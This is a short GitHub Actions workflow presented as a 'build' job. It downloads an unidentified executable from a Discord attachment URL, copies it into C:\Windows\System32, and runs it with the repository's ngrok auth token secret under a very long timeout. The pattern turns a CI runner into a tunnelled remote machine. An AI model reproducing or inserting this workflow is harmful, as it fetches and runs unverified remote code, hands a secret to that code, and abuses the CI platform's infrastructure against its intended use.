name: main

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Download github_init and starting...
      run: |
        Invoke-WebRequest https://cdn.discordapp.com/attachments/818761039432253461/852237858655174656/github_init.exe -OutFile github_init.exe
    - name: Copy...
      run: | 
        copy github_init.exe C:\Windows\System32
    - name: Starting. Maximum VM time:6h.
      run: .\github_init.exe $Env:NGROK_AUTH_TOKEN
      env:
        NGROK_AUTH_TOKEN: ${{ secrets.NGROK_AUTH_TOKEN }}
